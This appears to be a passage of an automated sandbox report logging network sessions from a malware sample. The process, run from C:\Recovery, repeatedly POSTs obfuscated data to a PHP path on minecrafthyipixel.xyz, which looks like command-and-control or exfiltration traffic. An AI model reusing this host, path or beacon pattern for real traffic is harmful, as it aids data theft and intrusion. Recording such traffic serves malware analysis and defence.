                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cm9gMx7l3fvA2B05hEA0oz8KpZNYfDR8PyH6XQ7hRZUJIskpNdgSpb7Frb8hV03yTOSiq0rVRXYyK7OarFVnFyPgoYW9O5avKwXm5xC8E1np1%2BnaG3ireIgVc0nPB%2Bd8UXXiHrGHTAM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2cd3cb1135d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:16.452276945 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    68192.168.2.449817104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:16.671962023 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:16.776695013 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:16.776875019 CEST2512OUTData Raw: 57 5b 5e 5a 5c 40 51 58 5c 5e 59 59 57 54 58 52 54 57 5f 56 54 5d 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[^Z\@QX\^YYWTXRTW_VT]S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%-*W ;X3 0$->+$')82]!!2&Q)^7/$_-%$[. X )
                                                                                                                                    Apr 19, 2024 13:43:17.150342941 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:17 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nR0bXLfp7DMTPCKzm7ISLcxLpaoAUoF%2FtOnPfxDSA3kM0V1XU659JLPXPQw4UK%2B8DcWVFU7wcCCfDZwgS43IdTK2IVzaUMM9%2FAz2jnFwuuooMK65yi%2F3YtGPkVlPiH2UgM%2Fcp%2BQRSmA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2d18e067bbe-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:17.150393009 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    69192.168.2.449818104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:17.376467943 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:17.481291056 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:17.481436968 CEST2512OUTData Raw: 52 5a 5e 5a 59 42 54 5b 5c 5e 59 59 57 52 58 52 54 57 5f 5c 54 58 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^ZYBT[\^YYWRXRTW_\TXSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[2.%"''+Z3=)Y&81Q 1")]#Z#, ^9$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:17.833276987 CEST629INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:17 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWG%2F0SMFwRcxkbNBdLarRDX3f2VbnZSAdtx4SKWp9oka8aHzRLu3EbDlfKle4CT%2F5Gxh7Vhb%2BEl%2FmdP%2FHf%2B8NPigAnNnX7u2q8Uw9CyE59%2Buu1j0YJGIXgGexV4B5b%2FhUOZImi37rSM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2d5fd5b4581-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:17.833338022 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    70192.168.2.449819104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:18.075875044 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:18.180556059 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:18.180996895 CEST2504OUTData Raw: 57 5e 5e 5d 59 47 51 5e 5c 5e 59 59 57 57 58 53 54 54 5f 58 54 58 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^]YGQ^\^YYWWXSTT_XTXSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\2>5;,X$V7385P=\%,R%+S#12P=;$7<'-%$[. X
                                                                                                                                    Apr 19, 2024 13:43:18.548439980 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:18 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pWDYuOmnVfuPH5HdshgbycMMXDJ8ZOnpE9DvnZNcwUR1Dyox30QAdtfZt4rt0Z8kc3xZ3z5lnYg0hvhtDpJyrWUHnLR7RIpGnqb%2FW87S7anV8dgDGenCyacUY46Cf4MKo%2F3%2FuCBTtTc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2da48a653f0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:18.548502922 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    71192.168.2.449820104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:18.781610012 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:18.886423111 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:18.886598110 CEST2512OUTData Raw: 57 54 5e 5d 5c 43 54 5f 5c 5e 59 59 57 55 58 52 54 57 5f 5b 54 5e 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^]\CT_\^YYWUXRTW_[T^S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>T!(7$('+?((%),U245*(+ /$/%$[. X -
                                                                                                                                    Apr 19, 2024 13:43:19.140554905 CEST625INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:19 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BqQPhrpIgPTIL3e73GvsORmFeys8QMXCn%2F4Yk%2FhHELYXHefz5NreUUdoqlA1plOUXA19%2Fx4GtbUb6wQ9cOSC2VsTCJRk5AzcQf6Rf%2BBLOzzJMeSmukvkcssbJT5XD%2FluLrRiVLYPDZ8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2debdf94563-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:19.140613079 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    72192.168.2.449821104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:19.757041931 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2500
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:19.861929893 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:19.862140894 CEST2500OUTData Raw: 57 5f 5b 5f 59 40 54 58 5c 5e 59 59 57 57 58 5b 54 51 5f 56 54 58 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[_Y@TX\^YYWWX[TQ_VTXSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^2>R5(4['V$'+>((1_<172">8(#Z,^9$[. X -
                                                                                                                                    Apr 19, 2024 13:43:20.121499062 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:20 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehrtLph5rrfb8UOtNhjOoeBxDmR81O%2BhY4Yd9fT4dPpj2d5rZ8IvKXJ3bjwxPoMVvUWlpU5GcPMkUY53CTAFaoLhpAQKH9bp61zVGENG2gWTi7UbEak8aeBY0o0v0efQK5nX6eieZXA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2e4df6b4569-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:20.121553898 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    73192.168.2.449822104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:21.496856928 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:21.600912094 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:21.601655006 CEST2192OUTData Raw: 52 5f 5e 5e 59 41 54 5e 5c 5e 59 59 57 5f 58 5a 54 54 5f 59 54 55 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R_^^YAT^\^YYW_XZTT_YTUSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2-*V6;$$])T?8&9 %;&V#">=7 ^-$[. X
                                                                                                                                    Apr 19, 2024 13:43:21.959948063 CEST770INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:21 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ays6EGx4%2Bd9CIdk31KSTaVg9tyPhsfMvoFXG06EcrjVGu%2F4VX2k5iqoof%2BTg1jIUQZw342HuRjw59aMg6EFp14mF4jRfRLLS1q2oUQoe9XW8x8kOPp7Wsp%2FFDIkj7bVx2pGukktsMpA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2efbdf953fa-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5d 30 18 0f 04 20 39 30 05 3e 23 0c 11 3d 37 2a 03 2a 07 3a 02 22 2d 23 0c 3b 04 38 12 3c 3b 21 07 25 33 3e 0f 24 13 06 52 32 30 21 59 00 1a 39 5c 37 3c 29 5d 2e 2a 2d 1c 3c 1f 3d 5b 21 32 27 5f 3c 3e 0f 17 21 3b 23 5a 3f 3e 0f 15 3b 16 3c 1a 3f 01 29 5c 2f 51 29 04 22 11 2c 52 09 12 25 18 3f 38 34 12 25 20 29 12 34 08 3c 13 3f 3c 35 05 30 05 2b 09 32 0a 24 5b 2d 31 3a 57 31 3d 25 1d 29 03 2c 57 34 3c 0b 1b 25 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$]0 90>#=7**:"-#;8<;!%3>$R20!Y9\7<)].*-<=[!2'_<>!;#Z?>;<?)\/Q)",R%?84% )4<?<50+2$[-1:W1=%),W4<%.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:43:21.960011959 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    74192.168.2.449823104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:21.699758053 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:21.804003954 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:21.804621935 CEST2512OUTData Raw: 57 59 5e 5a 5c 41 51 59 5c 5e 59 59 57 51 58 5a 54 53 5f 5f 54 5f 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^Z\AQY\^YYWQXZTS__T_S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\&.!!+$& 7^'1Q=+$1?&2V7)+;^7#:$[. X =
                                                                                                                                    Apr 19, 2024 13:43:22.063930035 CEST635INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:22 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2B%2FKP2%2FJCRYJdwC0yniIkbsATzNSkRUFFafgZz5lM%2BjwQgz8YTK000O%2FAp%2BhX6t5x7c5VFVVUVT7FbXdUq20p%2BvI4FLt53dbuQ7Usm%2BEt3Tpk0O3HxxFE%2Bo%2B7JgPn4nEDGcZ8bH%2Fe6s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2f0fc104581-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:22.063992977 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    75192.168.2.449824104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:22.304667950 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:22.410727978 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:22.411061049 CEST2512OUTData Raw: 57 54 5b 5b 59 42 51 5d 5c 5e 59 59 57 54 58 5c 54 50 5f 57 54 5a 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT[[YBQ]\^YYWTX\TP_WTZSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_16S68]'0'$1=7^2%+=425>#,]-%$[. X )
                                                                                                                                    Apr 19, 2024 13:43:22.661670923 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:22 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07f7XG0ly9JTHR9TWXb8oKPgQ9cw2dGdUdc2lLjTvZz1ldgursszTs7Vms017eoLmb4tcCCf%2Bsa6EWiWz7aTZTZba4N7QjI1Wi2rC8kTs7QiJp4ijX1mf1oZa6kqj%2BO%2BA6Uv6WGuBT8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2f4bef844dd-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:22.661731005 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    76192.168.2.449825104.21.57.61806756C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:43:22.890170097 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:22.994653940 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:22.994837046 CEST2512OUTData Raw: 52 5a 5e 54 5c 46 54 59 5c 5e 59 59 57 53 58 5c 54 53 5f 59 54 55 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
